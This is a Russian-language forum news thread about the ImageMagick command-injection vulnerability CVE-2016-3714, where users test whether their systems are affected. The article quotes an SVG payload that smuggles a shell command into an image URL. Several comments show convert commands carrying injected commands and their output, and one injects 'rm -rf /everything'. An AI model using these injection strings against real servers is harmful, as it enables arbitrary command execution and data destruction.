LINUX.ORG.RU

Критическая уязвимость в ImageMagick, под угрозой многие веб-серверы

 ,


3

3

В ImageMagick устранена уязвимость (CVE-2016-3714), позволяющая организовать выполнение произвольного кода при обработке специально сформированного изображения. По доброй традиции уязвимость обзавелась собственным именем и сайтом.

Уязвимость заключается в том, что имена файлов не проверяются при вызове внешних обработчиков.

Проблему усугубляют два обстоятельства. Во-первых, уязвимость работает и при косвенном обращении (например, с помощью SVG-файла, в котором содержится тег ‹image xlink:href="https://example.com/image.jpg"|ls "-la"›), при этом будет выполнена команда ls). Во-вторых, ImageMagick проверяет тип файла не по расширению, а по содержимому заголовка, поэтому защититься от атаки, просто заблокировав обработку файлов с определёнными расширениями, не получится.

По некоторым данным, об уязвимости было известно посторонним лицам ещё до её официального обнародования. Подготовлен рабочий эксплоит.

ImageMagick часто применяется на серверах для создания превьюшек к изображениям.

>>> Подробности

anonymous

Проверено: leave ()

Ого. Пошел обновлять ImageMagick.

DeadEye ★★★★★ ()

Не работает:

$ convert 'https://example.com"|ls "-la' out.png
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.
convert: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3210.

При http:

error : Unknown IO error
error : Unknown IO error
Ошибка сегментирования

kostik87 ★★★★★ ()

Сказал бы что решето, но и так понятно..

disee ★★★ ()
Ответ на: комментарий от subwoofer
$ convert 'https://example.com";ls -la"' out.png
итого 76
drwxrwxrwt 15 root       root         500 май  5 13:59 .
drwxr-xr-x 24 root       root        4096 апр 29 20:11 ..
-rw-------  1 konstantin konstantin 55456 май  5 13:57 audacious-temp-TWT2GY
-rw-r--r--  1 konstantin konstantin   112 май  5 13:50 
...
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.
convert: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3210.

У меня на этой системе ImageMagick 6.9.0.3.

Ну и только вот с этими флагами: X bzip2 cxx djvu jpeg jpeg2k lcms openmp pango png svg tiff truetype xml zlib.

kostik87 ★★★★★ ()

Шерето, но вообще уязвимость убойная.

upcFrost ★★★★★ ()
Ответ на: комментарий от subwoofer

Файла out.png всё равно нет, но это из-за «no decode delegate for this image format `HTTPS'».

kostik87 ★★★★★ ()

Мне кажется, или что-то подобное я читал год назад?

a1batross ★★★★★ ()

Пришло обновление в седьмой дебиан. Хотя сабж там, кажется, стоит просто на всякий случай, превтюшки (кажется) генерируются php-gd

MrClon ★★★★★ ()
Ответ на: комментарий от kostik87
convert 'https://example.com"; echo -ne ls\\nrm -rf /everything > out.png; sh ./out.png"' out.png

Ну можно вот так

octy ★★ ()

2016
Пользоваться ImageMagick вместо GraphicsMagick

В GraphicsMagick тоже есть аналогичная уязвимость? А то автора про GraphicsMagick, похоже, не в курсе.

liberte ()

А нахер эту прогу в десктоп суют по умолчанию? В последней убунте в главном меню аж дважды оно есть. Зачем?

anonymous ()
Ответ на: комментарий от mos

У меня сервер один. ImageMagick там не тыкается, но это один черт решето, и решето серьезное.

DeadEye ★★★★★ ()
Ответ на: комментарий от liberte

Тока шта проверил на убунте 16.04. Обуязвимновлённой до упора imagemagick - уязвим graphicsmagick - неуязвим Хотя кто сейчас gs на вебсерверах пользует?

anonymous ()

А исправления то есть? В арч не прилетело пока.

Klymedy ★★★★★ ()

Кто там ближайший конкурент ImageMagick? Кому выгодно?

Vinni_Pooh ★★★★ ()

Он слишком сложный, чтобы быть надёжным.

pacify ★★★★★ ()

лицорука

anonymous ()

эта уязвимость есть и в zip/других архивнаторах

также в 99% самопальных просмоторщиках свг или xml....вобщем всем вообще всем где есть дозагрузка содержимого из инета и программа «наколенная»(в случае имеджемаджик-она слишком древняя и поддержка свг пилилась фигпойми кем уже поверх рабочего проекта...очевидно к чему привело)

hxf88097 ()
Ответ на: комментарий от fcx

Главное не забыть ритуально сжечь компьютер на ближайшей помойке.

rinsvid ()
Ответ на: комментарий от Vinni_Pooh

обычную очередную закладку АНБ нашли, что все так волнуются...

WindowsXP ★★ ()
Ответ на: комментарий от hxf88097

Откуда ты выполз-то? Научись сначала в речь, закончи школу, научись приводить пруфы своему бессвязному бреду, прежде чем влезать в разговоры взрослых дядь!

Indexator ★★★ ()
Ответ на: комментарий от anonymous

Не понял, причем тут школа.

Лужи газифицируют вон там ============>

DeadEye ★★★★★ ()
Ответ на: комментарий от Klymedy

Спасибо, что рассказал всем, что арч не парится об апдейтах безопасности.

Зато софт свежий, бггг.

DeadEye ★★★★★ ()
Ответ на: комментарий от DeadEye

Вопрос был в том, прилетело ли оно хоть куда-нибудь, или об уязвимости известно, но фикса нет.

Klymedy ★★★★★ ()
Ответ на: комментарий от Klymedy

В Debian пока нет (хз что там прилетело у MrClon)

Но на https://imagetragick.com/ написано как залепить дырку с помощью изоленты и правки конфига.

NeOlip ()

Помню, много-много лет назад, когда мобильный интернет стоил невероятно дорого, при помощи подобного бага, можно было на халяву выкачивать контент из сети, через MMS на 000. Кто помнит, оператора вы знайте)

nadim ()
Ответ на: комментарий от MozillaFirefox

ну а кому прилетело обновление? https://www.debian.org/security/

что твориться? ничего не понимаю, сделал апт-гет «пошел дебиан на хер»

anonymous ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.